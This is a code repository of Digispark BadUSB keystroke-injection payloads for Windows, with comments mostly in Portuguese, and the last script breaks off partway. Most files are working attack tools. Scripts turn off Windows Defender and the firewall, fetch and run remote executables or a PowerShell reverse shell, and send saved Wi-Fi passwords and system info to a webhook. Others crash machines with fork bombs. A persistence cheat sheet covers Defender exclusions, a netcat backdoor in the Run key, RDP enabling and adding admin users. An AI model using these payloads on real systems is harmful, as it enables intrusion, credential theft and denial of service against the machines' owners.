├── Metasploit-Revshell ├── meta.rc ├── Smallcmdshell │ └── cmdrevshell.ino ├── FastMRShell │ └── Metasploit-Revshell.ino ├── DirectROOT │ └── Metasploit-Revshell.ino └── persistent.txt ├── Revshell-ps1 ├── scriptps1.txt └── Revshell-ps1.ino ├── Fakeupdate └── Fake-update.ino ├── Windows-Crasher └── Windows-Crasher.ino ├── ForkBomb └── forkbomb.ino ├── Grab-WindowsSysinfo └── Grab-WindowsSysinfo.ino ├── Steal-Wifi-Passwd └── Steal-Wifi-Passwd.ino ├── Wallpaper-Prank └── Wallpaper-Prank.ino ├── Netcat-Revshell └── Nc-Reverseshell.ino ├── Z - Libraries ├── scancode-ascii-table.h └── DigiKeyboardPtBr.h └── README.md /Metasploit-Revshell/meta.rc: -------------------------------------------------------------------------------- 1 | set autorunscript post/windows/manage/priv_migrate 2 | use exploit/multi/handler 3 | set payload windows/meterpreter/reverse_tcp 4 | set lhost yourip 5 | set lport port 6 | exploit -j 7 | -------------------------------------------------------------------------------- /Revshell-ps1/scriptps1.txt: -------------------------------------------------------------------------------- 1 | $sm=(New-Object Net.Sockets.TCPClient("YOURIP",PORT)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} 2 | -------------------------------------------------------------------------------- /Fakeupdate/Fake-update.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | void setup() { 3 | //empty 4 | } 5 | void loop() { 6 | DigiKeyboard.delay(2000); 7 | DigiKeyboard.sendKeyStroke(0); 8 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 9 | DigiKeyboard.delay(600); 10 | DigiKeyboard.print("https://youtu.be/dQw4w9WgXcQ?t=43s"); //Abre o video 11 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 12 | DigiKeyboard.delay(5000); 13 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 14 | DigiKeyboard.delay(3000); 15 | DigiKeyboard.print("http://fakeupdate.net/win10ue"); //Abre o site 16 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 17 | DigiKeyboard.delay(2000); 18 | DigiKeyboard.sendKeyStroke(KEY_F11); 19 | for (;;) { 20 | /*empty*/ 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Windows-Crasher/Windows-Crasher.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | 3 | void setup() { 4 | pinMode(1, OUTPUT); //LED on Model A 5 | } 6 | 7 | void loop() { 8 | 9 | DigiKeyboard.update(); 10 | DigiKeyboard.sendKeyStroke(0); 11 | DigiKeyboard.delay(3000); 12 | 13 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run 14 | DigiKeyboard.delay(100); 15 | DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible 16 | DigiKeyboard.delay(500); 17 | DigiKeyboard.println("(echo :ouch && echo start ouch.bat && echo goto ouch) > %temp%/ouch.bat"); //Creating payload in temporary dir 18 | DigiKeyboard.delay(300); 19 | DigiKeyboard.println("cd %temp% && ouch.bat"); //executing the payload 20 | DigiKeyboard.delay(500); 21 | 22 | digitalWrite(1, HIGH); //turn on led when program finishes - You can unplug now 23 | DigiKeyboard.delay(90000); 24 | digitalWrite(1, LOW); 25 | DigiKeyboard.delay(5000); 26 | } 27 | -------------------------------------------------------------------------------- /ForkBomb/forkbomb.ino: -------------------------------------------------------------------------------- 1 | //Esse script abre um prompt de comando do Windows e o faz abrir outra instância de si mesmo e assim por diante até que a máquina não aguente mais e trave ou crashe. Créditos ao BlackBoot. 2 | #include "DigiKeyboard.h" 3 | void setup() { 4 | } 5 | 6 | void loop() { 7 | DigiKeyboard.sendKeyStroke(0); 8 | DigiKeyboard.delay(500); 9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 10 | DigiKeyboard.delay(500); 11 | DigiKeyboard.print("cmd"); 12 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 13 | DigiKeyboard.delay(500); 14 | //Esconde o terminal 15 | DigiKeyboard.print("MODE CON: COLS=15 LINES=1"); 16 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 17 | DigiKeyboard.delay(100); 18 | DigiKeyboard.print("COLOR EF"); 19 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 20 | //Executa o Forkbomb 21 | DigiKeyboard.delay(500); 22 | DigiKeyboard.print(F("for /l %x in (0,0,0) do start")); 23 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 24 | for (;;) { 25 | /*Para o script*/ 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /Grab-WindowsSysinfo/Grab-WindowsSysinfo.ino: -------------------------------------------------------------------------------- 1 | /* 2 | Following payload will grab systeminfo and will send them to your hosted webhook. 3 | */ 4 | 5 | #include "DigiKeyboard.h" 6 | 7 | void setup() { 8 | pinMode(1, OUTPUT); //LED on Model A 9 | } 10 | 11 | void loop() { 12 | 13 | DigiKeyboard.update(); 14 | DigiKeyboard.sendKeyStroke(0); 15 | DigiKeyboard.delay(3000); 16 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run 17 | DigiKeyboard.delay(100); 18 | DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible for trying to making it as less noticeable as possible 19 | DigiKeyboard.delay(500); 20 | DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir 21 | DigiKeyboard.delay(300); 22 | DigiKeyboard.println("systeminfo > sysinfo.txt"); //grabbing the system info and saving them in temporary dir 23 | DigiKeyboard.delay(6000); 24 | DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/YOURLINK -Method POST -InFile sysinfo.txt"); //Submitting system info on hook 25 | DigiKeyboard.delay(1000); 26 | DigiKeyboard.println("del sysinfo.txt /s /f /q"); //cleaning up all the mess 27 | DigiKeyboard.delay(500); 28 | DigiKeyboard.println("exit"); 29 | DigiKeyboard.delay(100); 30 | digitalWrite(1, HIGH); //turn on led when program finishes 31 | DigiKeyboard.delay(90000); 32 | digitalWrite(1, LOW); 33 | DigiKeyboard.delay(5000); 34 | 35 | } 36 | 37 | -------------------------------------------------------------------------------- /Steal-Wifi-Passwd/Steal-Wifi-Passwd.ino: -------------------------------------------------------------------------------- 1 | /* 2 | O payload a seguir irá capturar as senhas salvas na máquina alvo e enviará para o seu webhook hospedado. 3 | */ 4 | 5 | #include "DigiKeyboard.h" 6 | 7 | void setup() { 8 | pinMode(1, OUTPUT); //LED on Model A 9 | } 10 | 11 | void loop() { 12 | 13 | DigiKeyboard.update(); 14 | DigiKeyboard.sendKeyStroke(0); 15 | DigiKeyboard.delay(3000); 16 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Começa o script 17 | DigiKeyboard.delay(100); 18 | DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //menor janela de cmd possível para tentar torná-la o menos perceptível 19 | DigiKeyboard.delay(500); 20 | DigiKeyboard.println("cd %temp%"); //Ir para o diretório temp 21 | DigiKeyboard.delay(300); 22 | DigiKeyboard.println("netsh wlan export profile key=clear"); //Pegando todas as senhas wifi salvas e salvando-as no diretório temp 23 | DigiKeyboard.delay(500); 24 | DigiKeyboard.println("powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extraindo todas as senhas e salvando-as no arquivo Wi-Fi-Pass no diretório temp 25 | DigiKeyboard.delay(500); 26 | DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/Yourlink -Method POST -InFile Wi-Fi-PASS"); //Enviando todas as senhas salvas para o WebHook 27 | DigiKeyboard.delay(1000); 28 | DigiKeyboard.println("del Wi-Fi* /s /f /q"); //Limpando toda a bagunça 29 | DigiKeyboard.delay(500); 30 | DigiKeyboard.println("exit"); 31 | DigiKeyboard.delay(100); 32 | digitalWrite(1, HIGH); //Liga o led quando acabar o script 33 | DigiKeyboard.delay(90000); 34 | digitalWrite(1, LOW); 35 | DigiKeyboard.delay(5000); 36 | 37 | } 38 | 39 | -------------------------------------------------------------------------------- /Wallpaper-Prank/Wallpaper-Prank.ino: -------------------------------------------------------------------------------- 1 | //Este script para o digispark faz uma captura de tela da área de trabalho, define-a como papel de parede e oculta os ícones da área de trabalho. 2 | //Funciona no Windows XP(?)/Vista(?)/7/8/8.1/10 etc. 3 | 4 | #include "DigiKeyboard.h" 5 | void setup() { 6 | //empty 7 | } 8 | void loop() { 9 | DigiKeyboard.sendKeyStroke(0); 10 | DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT); 11 | DigiKeyboard.delay(500); 12 | DigiKeyboard.sendKeyStroke(70, MOD_ALT_LEFT); 13 | DigiKeyboard.delay(500); 14 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 15 | DigiKeyboard.delay(500); 16 | DigiKeyboard.print("mspaint"); 17 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 18 | DigiKeyboard.delay(800); 19 | DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT); 20 | DigiKeyboard.delay(500); 21 | DigiKeyboard.sendKeyStroke(KEY_S, MOD_CONTROL_LEFT); 22 | DigiKeyboard.delay(600); 23 | DigiKeyboard.print("%USERPROFILE%\\wall.jpg"); 24 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 25 | DigiKeyboard.delay(600); 26 | DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); 27 | DigiKeyboard.delay(500); 28 | DigiKeyboard.sendKeyStroke(KEY_K); 29 | DigiKeyboard.delay(500); 30 | DigiKeyboard.sendKeyStroke(KEY_F); 31 | DigiKeyboard.delay(500); 32 | DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); 33 | DigiKeyboard.delay(500); 34 | DigiKeyboard.sendKeyStroke(KEY_X); 35 | DigiKeyboard.delay(600); 36 | DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT); 37 | DigiKeyboard.delay(500); 38 | DigiKeyboard.sendKeyStroke(KEY_F10, MOD_SHIFT_LEFT); 39 | DigiKeyboard.delay(500); 40 | DigiKeyboard.sendKeyStroke(KEY_V); 41 | DigiKeyboard.delay(200); 42 | DigiKeyboard.sendKeyStroke(81); 43 | DigiKeyboard.delay(200); 44 | DigiKeyboard.sendKeyStroke(81); 45 | DigiKeyboard.delay(200); 46 | DigiKeyboard.sendKeyStroke(81); 47 | DigiKeyboard.delay(200); 48 | DigiKeyboard.sendKeyStroke(81); 49 | DigiKeyboard.delay(200); 50 | DigiKeyboard.sendKeyStroke(81); 51 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 52 | for(;;){ /*empty*/ } 53 | } 54 | -------------------------------------------------------------------------------- /Revshell-ps1/Revshell-ps1.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | #include "DigiKeyboardPtBr.h" 3 | 4 | void setup() { 5 | pinMode(0,OUTPUT); 6 | pinMode(1,OUTPUT); 7 | } 8 | void loop() { 9 | pisca_led(100); 10 | //Desliga o Windows Defender 11 | DigiKeyboard.delay(1000); 12 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 13 | DigiKeyboard.delay(1500); 14 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 15 | DigiKeyboard.delay(1500); 16 | DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar 17 | DigiKeyboard.delay(1000); 18 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 19 | DigiKeyboard.delay(2000); 20 | //DigiKeyboard.print("\t"); 21 | DigiKeyboard.delay(300); 22 | DigiKeyboard.print("\t"); 23 | DigiKeyboard.delay(300); 24 | DigiKeyboard.print("\t"); 25 | DigiKeyboard.delay(300); 26 | DigiKeyboard.print("\t"); 27 | DigiKeyboard.delay(300); 28 | DigiKeyboard.print("\t"); 29 | DigiKeyboard.delay(1000); 30 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 31 | DigiKeyboard.delay(500); 32 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 33 | DigiKeyboard.delay(500); 34 | DigiKeyboard.print("\t"); //1 TAB 35 | DigiKeyboard.delay(500); 36 | DigiKeyboard.print("\t"); //1 TAB 37 | DigiKeyboard.delay(500); 38 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 39 | DigiKeyboard.delay(2000); 40 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela 41 | DigiKeyboard.delay(200); 42 | //Reverse shell 43 | DigiKeyboard.sendKeyStroke(0); 44 | DigiKeyboard.delay(500); 45 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 46 | DigiKeyboard.delay(500); 47 | DigiKeyboard.print("powershell"); 48 | DigiKeyboard.delay(500); 49 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 50 | DigiKeyboard.delay(500); 51 | DigiKeyboard.println("powershell -windowstyle hidden \"IEX (New-Object Net.WebClient).DownloadString('https://YOURGIST/shell.ps1');\""); 52 | DigiKeyboard.delay(500); 53 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 54 | DigiKeyboard.delay(500); 55 | // 56 | pisca_led(1000); 57 | for(;;){ /*empty*/ } 58 | } 59 | 60 | void pisca_led(int velocidade){ 61 | for (int inicio =1; inicio <= 10; inicio ++) { 62 | digitalWrite(0, HIGH); 63 | digitalWrite(1, HIGH); 64 | DigiKeyboardPtBr.delay(velocidade); 65 | digitalWrite(0, LOW); 66 | digitalWrite(1, LOW); 67 | DigiKeyboardPtBr.delay(velocidade); 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /Metasploit-Revshell/Smallcmdshell/cmdrevshell.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | #include "DigiKeyboardPtBr.h" 3 | 4 | void setup() { 5 | pinMode(0,OUTPUT); 6 | pinMode(1,OUTPUT); 7 | } 8 | 9 | void loop() { 10 | pisca_led(100); 11 | //Desliga o Windows Defender 12 | DigiKeyboard.delay(1000); 13 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 14 | DigiKeyboard.delay(1500); 15 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 16 | DigiKeyboard.delay(1500); 17 | DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar 18 | DigiKeyboard.delay(1000); 19 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 20 | DigiKeyboard.delay(1000); 21 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 22 | DigiKeyboard.delay(500); 23 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 24 | DigiKeyboard.delay(500); 25 | DigiKeyboard.print("\t\t"); //2 TAB 26 | DigiKeyboard.delay(500); 27 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 28 | DigiKeyboard.delay(1000); 29 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 30 | DigiKeyboard.delay(500); 31 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 32 | DigiKeyboard.delay(1000); 33 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 34 | DigiKeyboard.delay(500); 35 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 36 | DigiKeyboard.delay(500); 37 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 38 | DigiKeyboard.delay(500); 39 | DigiKeyboard.print("\t\t"); //2 TAB 40 | DigiKeyboard.delay(500); 41 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 42 | DigiKeyboard.delay(1000); 43 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela 44 | DigiKeyboard.delay(2000); 45 | //Download assembly script 46 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 47 | DigiKeyboard.delay(500); 48 | DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); 49 | DigiKeyboard.delay(1500); 50 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 51 | DigiKeyboard.delay(1500); 52 | DigiKeyboard.println("cmd /c powershell -Command wget 'http://YOURIP/exploit.exe' -Outfile c:/windows/temp/exploit.exe ; c:/windows/temp/exploit.exe"); 53 | DigiKeyboard.delay(1000); 54 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 55 | DigiKeyboard.delay(1000); 56 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); 57 | // 58 | pisca_led(1000); 59 | for(;;){ /*empty*/ } 60 | } 61 | 62 | void pisca_led(int velocidade){ 63 | for (int inicio =1; inicio <= 10; inicio ++) { 64 | digitalWrite(0, HIGH); 65 | digitalWrite(1, HIGH); 66 | DigiKeyboardPtBr.delay(velocidade); 67 | digitalWrite(0, LOW); 68 | digitalWrite(1, LOW); 69 | DigiKeyboardPtBr.delay(velocidade); 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /Metasploit-Revshell/FastMRShell/Metasploit-Revshell.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | #include "DigiKeyboardPtBr.h" 3 | 4 | void setup() { 5 | pinMode(0,OUTPUT); 6 | pinMode(1,OUTPUT); 7 | } 8 | 9 | void loop() { 10 | pisca_led(100); 11 | //Desliga o Windows Defender 12 | DigiKeyboard.delay(1000); 13 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 14 | DigiKeyboard.delay(1500); 15 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 16 | DigiKeyboard.delay(1500); 17 | DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar 18 | DigiKeyboard.delay(1000); 19 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 20 | DigiKeyboard.delay(1000); 21 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 22 | DigiKeyboard.delay(500); 23 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 24 | DigiKeyboard.delay(500); 25 | DigiKeyboard.print("\t\t"); //2 TAB 26 | DigiKeyboard.delay(500); 27 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 28 | DigiKeyboard.delay(1000); 29 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 30 | DigiKeyboard.delay(500); 31 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 32 | DigiKeyboard.delay(1000); 33 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 34 | DigiKeyboard.delay(500); 35 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 36 | DigiKeyboard.delay(500); 37 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 38 | DigiKeyboard.delay(500); 39 | DigiKeyboard.print("\t\t"); //2 TAB 40 | DigiKeyboard.delay(500); 41 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 42 | DigiKeyboard.delay(1000); 43 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela 44 | DigiKeyboard.delay(5000); 45 | //Reverse shell 46 | DigiKeyboard.sendKeyStroke(0); 47 | DigiKeyboard.delay(500); 48 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 49 | DigiKeyboard.delay(500); 50 | DigiKeyboard.print("powershell"); 51 | DigiKeyboard.delay(500); 52 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 53 | DigiKeyboard.delay(1000); 54 | DigiKeyboard.println("Invoke-WebRequest -Uri http://YOURIP/exploit.exe -OutFile exploit.exe"); 55 | DigiKeyboard.delay(700); 56 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 57 | DigiKeyboard.delay(3000); 58 | DigiKeyboard.println("powershell -windowstyle hidden start ./exploit.exe"); 59 | DigiKeyboard.delay(1000); 60 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 61 | // 62 | pisca_led(1000); 63 | for(;;){ /*empty*/ } 64 | } 65 | 66 | void pisca_led(int velocidade){ 67 | for (int inicio =1; inicio <= 10; inicio ++) { 68 | digitalWrite(0, HIGH); 69 | digitalWrite(1, HIGH); 70 | DigiKeyboardPtBr.delay(velocidade); 71 | digitalWrite(0, LOW); 72 | digitalWrite(1, LOW); 73 | DigiKeyboardPtBr.delay(velocidade); 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /Metasploit-Revshell/DirectROOT/Metasploit-Revshell.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | #include "DigiKeyboardPtBr.h" 3 | 4 | void setup() { 5 | pinMode(0,OUTPUT); 6 | pinMode(1,OUTPUT); 7 | } 8 | 9 | void loop() { 10 | pisca_led(100); 11 | //Desliga o Windows Defender 12 | DigiKeyboard.delay(1000); 13 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 14 | DigiKeyboard.delay(1500); 15 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 16 | DigiKeyboard.delay(1500); 17 | DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar 18 | DigiKeyboard.delay(1000); 19 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 20 | DigiKeyboard.delay(1000); 21 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 22 | DigiKeyboard.delay(500); 23 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 24 | DigiKeyboard.delay(500); 25 | DigiKeyboard.print("\t\t"); //2 TAB 26 | DigiKeyboard.delay(500); 27 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 28 | DigiKeyboard.delay(1000); 29 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 30 | DigiKeyboard.delay(500); 31 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 32 | DigiKeyboard.delay(1000); 33 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 34 | DigiKeyboard.delay(500); 35 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 36 | DigiKeyboard.delay(500); 37 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 38 | DigiKeyboard.delay(500); 39 | DigiKeyboard.print("\t\t"); //2 TAB 40 | DigiKeyboard.delay(500); 41 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 42 | DigiKeyboard.delay(1000); 43 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela 44 | DigiKeyboard.delay(2000); 45 | //Reverse shell 46 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 47 | DigiKeyboard.delay(500); 48 | DigiKeyboard.print("powershell start-process powershell -verb runas"); 49 | DigiKeyboard.delay(500); 50 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 51 | DigiKeyboard.delay(3000); 52 | DigiKeyboard.print("\t\t"); 53 | DigiKeyboard.delay(500); 54 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 55 | DigiKeyboard.delay(1000); 56 | DigiKeyboard.println("Invoke-WebRequest -Uri http://YOURIP/exploit.exe -OutFile exploit.exe"); 57 | DigiKeyboard.delay(700); 58 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 59 | DigiKeyboard.delay(3000); 60 | DigiKeyboard.println("powershell -windowstyle hidden start ./vnc.exe"); 61 | DigiKeyboard.delay(1000); 62 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 63 | // 64 | pisca_led(1000); 65 | for(;;){ /*empty*/ } 66 | } 67 | 68 | void pisca_led(int velocidade){ 69 | for (int inicio =1; inicio <= 10; inicio ++) { 70 | digitalWrite(0, HIGH); 71 | digitalWrite(1, HIGH); 72 | DigiKeyboardPtBr.delay(velocidade); 73 | digitalWrite(0, LOW); 74 | digitalWrite(1, LOW); 75 | DigiKeyboardPtBr.delay(velocidade); 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /Metasploit-Revshell/persistent.txt: -------------------------------------------------------------------------------- 1 | ## Win AV 2 | 3 | Set-MpPreference -ExclusionPath 'C:\Users\USERNAME\appdata\roaming\microsoft\windows\start menu\programs\startup' //Set an exclusion path or file. 4 | Set-MpPreference -ExclusionPath 'C:\%homepath%\appdata\roaming\microsoft\windows\start menu\programs\startup' //Set an exclusion path or file. 5 | powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" 6 | powershell -Command Add-MpPreference -ExclusionProcess "java.exe" 7 | powershell -Command Add-MpPreference -ExclusionExtension ".java" 8 | 9 | powershell -Command Remove-MpPreference -ExclusionExtension ".java" 10 | 11 | Get-Command -Module Defender //List commands. 12 | 13 | Get-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,IsTamperProtected,AntivirusSignatureLastUpdated //List all the security infos. 14 | 15 | Get-Service Windefend, SecurityHealthService, wscsvc| Select Name,DisplayName, Status //List. 16 | 17 | Set-MpPreference -DisableRealtimeMonitoring $true //Disable / enable av protection. 18 | 19 | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 //Enable RDP from powershell 20 | 21 | Enable-NetFirewallRule -DisplayGroup "Remote Desktop" //ADD firewall rule to access RDP - Sistema em ingles 22 | Enable-NetFirewallRule -DisplayGroup "Área de Trabalho Remota" //ADD firewall rule to access RDP - Sistema em br 23 | 24 | Set-MpPreference -MAPSReporting 0 ​//Disable cloud-based protection. 25 | 26 | ## Reg, Fir, netsh & netuser 27 | 28 | reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe' //Adiciona uma regra para o nc abrir a porta 4445. 29 | 30 | netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445 //Adiciona uma regra de firewall para liberar a porta 4445 para o nc. 31 | 32 | netsh firewall show portopening //Lista as portas liberadas pelo firewall. 33 | 34 | netsh advfirewall firewall add rule name="rdp" protocol=TCP dir=in localport=3389 action=allow //Cria uma regra de firewall para a porta 3389 RDP 35 | 36 | ## Create user 37 | 38 | net user Administrator //Mostra as informações desse usuário. 39 | 40 | net user usuario senha /add //Adiciona um usuário com senha. 41 | 42 | net user usuario /active:yes //Ativa o usuario. 43 | net user usuario /active:no //Desativa o usuario. 44 | 45 | net localgroup //Lista grupos locais. 46 | 47 | net localgroup Administradores usuario /add //Adicionando o usuario no grupo dos admins. 48 | 49 | ## Wifi & SYSINFO 50 | 51 | netsh wlan show profile //Mostra todos os Wi-fi gravados. 52 | 53 | netsh wlan show profile name= "Wi-Fi name" key=clear //Printa os dados do Wi-Fi. 54 | 55 | systeminfo //Info do sistema. 56 | -------------------------------------------------------------------------------- /Netcat-Revshell/Nc-Reverseshell.ino: -------------------------------------------------------------------------------- 1 | #include "DigiKeyboard.h" 2 | #include "DigiKeyboardPtBr.h" 3 | 4 | void setup() { 5 | pinMode(0,OUTPUT); 6 | pinMode(1,OUTPUT); 7 | } 8 | 9 | void loop() { 10 | pisca_led(100); 11 | //Desliga o Windows Defender 12 | DigiKeyboard.delay(1000); 13 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 14 | DigiKeyboard.delay(1500); 15 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar 16 | DigiKeyboard.delay(1500); 17 | DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar 18 | DigiKeyboard.delay(1000); 19 | DigiKeyboard.print("\t\t\t\t"); //4 TAB 20 | DigiKeyboard.delay(1000); 21 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 22 | DigiKeyboard.delay(500); 23 | DigiKeyboard.sendKeyStroke(KEY_SPACE); 24 | DigiKeyboard.delay(500); 25 | DigiKeyboard.print("\t\t"); //2 TAB 26 | DigiKeyboard.delay(500); 27 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 28 | DigiKeyboard.delay(2000); 29 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela 30 | DigiKeyboard.delay(5000); 31 | //Desabilita o Firewall 32 | DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //Abre o executar 33 | DigiKeyboard.delay(500); 34 | DigiKeyboard.println("powershell start-process powershell -verb runas"); 35 | DigiKeyboard.delay(2000); 36 | DigiKeyboard.print("\t\t"); //2 TAB 37 | DigiKeyboard.delay(300); 38 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 39 | DigiKeyboard.delay(1000); 40 | DigiKeyboard.println("powershell -windowstyle hidden Set-NetFirewallProfile -Enabled False"); //Desabilita o Firewall :) 41 | DigiKeyboard.delay(300); 42 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 43 | DigiKeyboard.delay(500); 44 | DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas 45 | DigiKeyboard.delay(500); 46 | //Reverse shell 47 | DigiKeyboard.sendKeyStroke(0); 48 | DigiKeyboard.delay(500); 49 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 50 | DigiKeyboard.delay(500); 51 | DigiKeyboard.print("powershell"); 52 | DigiKeyboard.delay(500); 53 | 